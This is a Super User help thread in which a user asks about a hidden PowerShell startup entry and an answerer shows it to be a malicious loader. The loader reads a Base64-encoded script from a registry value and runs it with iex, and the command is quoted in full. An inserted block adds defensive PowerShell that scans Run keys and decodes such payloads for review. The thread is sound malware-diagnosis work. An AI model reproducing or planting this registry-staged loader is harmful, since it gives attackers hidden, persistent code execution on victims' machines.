Random powershell.exe process?

4

I noticed a couple days ago in Task Manager that I have a powershell.exe process running. When I went to msconfig it has a really long command. Here it is:

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)));

This is really weird because just today a random process that I had problems with before showed up (maybe it's not connected with this but just saying) which is a virus and tried to download an unsecured driver, as Windows says, on my PC. Could anyone tell me something about this PowerShell process? It starts up on startup and it's always running. Again, I hope I don't sound ignorant, maybe it's just a normal startup process.

VoLtury Bey

Posted 2016-09-19T21:18:16.237

Reputation: 75

Can this be harmful? If yes, how do I get rid of it, and if not, is this process important to Windows so I can just make it stop running on startup? – VoLtury Bey – 2016-09-19T21:27:24.603

Answers

9

This is almost certainly malicious.

Let's take it apart. It invokes Windows PowerShell (a legitimate and very useful command interpreter) without user customizations (-noprofile) in a hidden window (-windowstyle hidden), allowing the PowerShell session to run scripts regardless of the system policy (-executionpolicy bypass). It then runs this command:

iex ([Text.Encoding]::ASCII.Get.String([Convert]::FromBase64string((gp'HKCU:\Software\Classes\SAJELFZIXHQTV').ADUXJH)))

gp means Get-ItemProperty, which can be used to retrieve values of Registry keys, and that's what it's doing here. Apparently, there's a key called SAJELFZIXHQTV in your current user Software\Classes key. That key has a value called ADUXJH, the data in which is what gp retrieves. That data (evidently a string) is then Base64-decoded into a byte array (FromBase64String). Those bytes are then interpreted as ASCII text (ASCII.GetString). Bizarrely, there's an extra dot in the original, which should cause an error because the ASCII object has no member called Get. Given that the process sticks around, though, I suspect the extra dot is just a transcription error.

If that error wasn't there, the resulting text would be invoked as a PowerShell command (iex). In short, this command is designed to load an encoded script from the Registry and execute it. To see exactly what it's running, copy the above PowerShell command minus the iex and with the extra dot removed into a PowerShell prompt and run it. It will print the command that would be invoked. It almost certainly won't be benign.

You can stop that entry from auto-starting with the Autoruns tool. However, it's probably a good idea to do a deeper clean of your machine, since it's likely infected. Please see How can I remove malicious spyware, malware, adware, viruses, trojans or rootkits from my PC?

Ben N

Posted 2016-09-19T21:18:16.237

Reputation: 32 973
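As an added example (not part of the answer above), a defender-side PowerShell snippet that lists Run-key entries of the shape described in the answer and decodes the Registry-staged payload for inspection without ever passing it to iex. The regex, the Run-key locations and the assumption that the entry reads `(gp '<path>').<value>` are mine, based on the command quoted in the question.

```powershell
# Added example, not from the original thread. Inspects a loader of the form
#   powershell ... iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp '<path>').<value>)))
# and reproduces every step except the final Invoke-Expression.

function Get-RegistryStagedPayload {
    [CmdletBinding()]
    param(
        # Full command line as shown by msconfig, Autoruns or the Run key.
        [Parameter(Mandatory)][string]$CommandLine
    )

    # Assumed pattern: (gp '<key path>').<value name>, with or without a space after gp.
    $m = [regex]::Match($CommandLine, "gp\s*'(?<path>[^']+)'\)\.(?<value>\w+)")
    if (-not $m.Success) {
        Write-Warning 'No (gp ''<path>'').<value> fragment found in that command line.'
        return
    }
    $path  = $m.Groups['path'].Value
    $value = $m.Groups['value'].Value

    # Read the stored string; -ErrorAction Stop makes a missing key visible.
    $blob = (Get-ItemProperty -Path $path -ErrorAction Stop).$value

    # Same decoding the loader performs, returned as text instead of executed.
    $bytes = [Convert]::FromBase64String($blob)
    [Text.Encoding]::ASCII.GetString($bytes)
}

function Find-SuspiciousRunEntries {
    # Common autostart locations (assumed list; extend as needed). Report only.
    $hives = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($hive in $hives) {
        if (-not (Test-Path $hive)) { continue }
        $props = Get-ItemProperty -Path $hive
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata (PSPath etc.)
            $cmd = [string]$p.Value
            # Flag PowerShell launches that decode Base64 inline or via -EncodedCommand.
            if ($cmd -match 'powershell' -and $cmd -match 'FromBase64String|-enc') {
                [pscustomobject]@{ Hive = $hive; Name = $p.Name; Command = $cmd }
            }
        }
    }
}
```

Run `Find-SuspiciousRunEntries` first, then pipe a flagged entry's `Command` into `Get-RegistryStagedPayload` and save the output with `Out-File` for review; nothing in either function executes the decoded text.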

So, in short: this is a bad thing, right? Can you just explain what this thing is doing in a simpler way if it's possible? I'm a little worried right now since I've had this powershell process for a long time now and nothing has happened yet. – VoLtury Bey – 2016-09-19T21:49:18.127

@VoLturyBey Yes, it's probably a bad thing. It loads an encoded command from the Registry and executes it in the background, which is a moderately sketchy thing to do. I can't know exactly what that command does because it's only present in your Registry. Could you run the PowerShell command I included (minus the iex and with the extra dot fixed) please? That will show us what it's doing. – Ben N – 2016-09-19T21:51:27.610

Can it harm my PC if I do that? – VoLtury Bey – 2016-09-19T21:52:15.357

@VoLturyBey Without the iex, it will only show what it's already been running. That can't harm you, but what it's been doing is very likely malicious. – Ben N – 2016-09-19T21:53:56.390

I'm formatting my hdd in two or three days, do you guys think it's gonna do something bad until I do that? – VoLtury Bey – 2016-09-19T21:54:07.600

@VoLturyBey I wouldn't expect it to do anything different from what it has been doing, but I can't know for sure without seeing what it's executing. – Ben N – 2016-09-19T21:56:21.477

I think I'm just gonna wait until I format my PC. If it's been doing the same thing for the last month or two I don't think it's gonna do something really serious to my machine, right? I don't need you to 100% guarantee that it won't do anything, I understand that I didn't provide that much info, but I just want to know what you think. – VoLtury Bey – 2016-09-19T22:00:55.697

I would really like to know so I can just go to sleep without worrying about stuff... – VoLtury Bey – 2016-09-19T22:08:41.137

@VoLturyBey If it was me, I would be cleaning my computer very soon, but if you're not worried about anything it's already done, then I wouldn't expect anything to change within a couple days. – Ben N – 2016-09-19T22:09:32.067

Alright, I'll just format it in like two or three days. If something happened I'd just be the most unlucky dude on this site. Everything that's important has been backed up in multiple ways. I honestly don't care about any of my files on the PC. It's just that I need it for university and stuff tomorrow. – VoLtury Bey – 2016-09-19T22:12:49.513

Yeah I have my whole family using this pc... It could be them that got this thing on here. I don't know how to restrict them, all I can do is just tell them to be careful since I don't go to any weird sites and I never download unsafe programs or files. – VoLtury Bey – 2016-09-19T22:17:59.380

@Homey_D_Clown_IT I'm just wondering what's your opinion on this. Am I going to be safe for the next 2-3 days? Would you expect anything to happen? – VoLtury Bey – 2016-09-19T22:19:12.563

Well, I guess I'm safe then. Everything important has been backed up and I don't really have any bank info or stuff like that on my pc. You guys saved me from a sleepless night.. – VoLtury Bey – 2016-09-19T22:25:30.937